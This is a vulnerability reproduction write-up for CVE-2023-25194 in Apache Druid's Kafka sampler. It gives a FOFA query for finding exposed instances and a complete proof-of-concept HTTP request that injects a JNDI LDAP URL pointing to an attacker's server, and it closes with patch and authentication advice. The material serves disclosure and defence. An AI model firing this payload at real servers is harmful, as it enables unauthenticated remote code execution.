0x01 Product Introduction
Apache Druid is a high-performance real-time big data analysis engine that supports fast data ingestion, real-time query and data visualization. It is mainly used in OLAP (Online Analytical Processing) scenarios and can process PB-level data. Druid has the characteristics of high scalability, low latency and high throughput, and is widely used in real-time monitoring, event-driven analysis, user behavior analysis, network security and other fields. By using Druid, enterprises and developers can quickly obtain real-time analysis results and improve decision-making efficiency.
0x02 Vulnerability Overview
In the scenario where Apache Druid uses Apache Kafka to load data, an unauthenticated remote attacker can configure Kafka connection properties, thereby exploiting the CVE-2023-25194 vulnerability to trigger JNDI injection and eventually execute arbitrary code. (Other products using Apache Kafka Connect may also be affected by the CVE-2023-25194 vulnerability)
0x03 range of influence
Affected version
0.19.0 <= Apache Druid <= 25.0.0
unaffected version
Apache Druid >= 26.0.0 (the fix has not yet been officially released)
0x04 Recurrence environment
FOFA syntax: title="Apache Druid"
The reproduced version is: 24.0.1
0x05 Vulnerability Reappearance
Access to the vulnerable environment
Fill in any characters, click apply, and burp captures packets
POC:
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1437
Connection: close
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"1.1.1.1:9092",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://x.x.x.x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"any",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
Modify the request package, fill in your malicious ldap service url at user.provider.url
Use DNSlog to verify the existence of vulnerabilities
Vulnerabilities exist
0x06 Repair suggestion
security update
At present, the official Apache Druid has temporarily fixed this vulnerability, but the new version has not been officially released. Users can download the source code and compile it.
Users can continue to pay attention to the release of the official new version of Apache Druid and update it in time.
Reference: https://github.com/apache/druid/tree/26.0.0
Mitigation
1. Enable authentication configuration for Apache Druid.
For details, please see: https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html
2. Move Apache Druid to the intranet if the business permits.